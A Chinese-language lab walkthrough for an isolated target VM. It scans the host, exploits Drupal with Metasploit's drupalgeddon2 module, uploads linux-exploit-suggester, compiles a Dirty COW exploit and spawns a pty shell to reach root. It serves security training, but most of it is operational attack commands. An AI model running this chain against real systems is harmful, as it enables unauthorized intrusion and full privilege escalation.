1、实验环境
KaLi 攻击机
Linux靶机 靶场
实验目的:
掌握漏洞利用的方法
掌握脏牛漏洞的原理
提高对内核安全性的认识
2、靶场搭建
VMware导入靶场
靶场地址:链接:百度网盘 请输入提取码百度网盘为您提供文件的网络备份、同步和分享服务。空间大、速度快、安全稳固,支持教育网加速,支持手机端。注册使用百度网盘即可享受免费存储空间
https://pan.baidu.com/s/10RcxsB4LH-41syPxAHcjVg?pwd=jve5
提取码:jve5
3、实验步骤
3.1、查看自己网卡信息
ip a
nat模式下的网卡,与靶机保存一致
3.2、主机发现
查找目标IP,发现144的IP地址
arp-scan -l
3.3、端口扫描
对144进行全端口扫描,发现开放22、80、1898端口
nmap -p- 192.168.188.144
3.4、漏洞利用
主要目的是复现脏牛漏洞,就不说渗透的具体细节了
使用Google插件Wappalyzer发现1898端口是DrupalCMS
使用msfconsole的search功能搜索该cms的历史漏洞
使用 exploit/unix/webapp/drupal_drupalgeddon2 模块进行攻击
查看配置信息,需要配置目标主机和端口
use exploit/unix/webapp/drupal_drupalgeddon2 利用指定模块的漏洞
show options 显示模块选项
set rhosts 192.168.188.144(目标机ip) 配置ip
set rport 1898 配置端口
run 运行
成功获取与目标的会话
发现是www权限,尝试提权
3.5 、进行提权
1、首先进行信息收集
上传linux漏洞检测脚本到/tmp目录下
upload /root/tools/linux提权工具/linux-exploit-suggester-master/linux-exploit-suggester.sh /tmp/
2、赋予执行权限,执行脚本,进行漏洞检测
3、发现存在脏牛漏洞
4、上传exp提权工具
ctrl+c 退出shell会话框
上传exp到靶机/tmp目录
5、提权利用
重新进入shell会话模式,并编译exp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp –lutil
注释:
g++:GNU 编译器集合中的 C++ 编译器。
-Wall:启用所有常见的警告信息。
-pedantic:更严格地遵循标准,发现一些非标准的用法。
-O2:启用优化级别 2,进行中级优化。
-std=c++11:使用 C++11 标准进行编译。
-pthread:启用 POSIX 线程支持。这对于使用多线程的程序是必要的。
-odcow:指定输出文件的名称为 dcow。
dcow.cpp:源代码文件的名称。
-lutil:链接 libutil 库。这是一个 POSIX 实用工具库,可能包含一些与系统操作相关的功能。
命令尽量手敲,复制粘贴容易报错。(不知道原因)
使用python开启一个交互式的shell虚拟终端
python -c 'import pty; pty.spawn("/bin/bash")'
运行脚本尝试提权
成功提权,自此提权完成
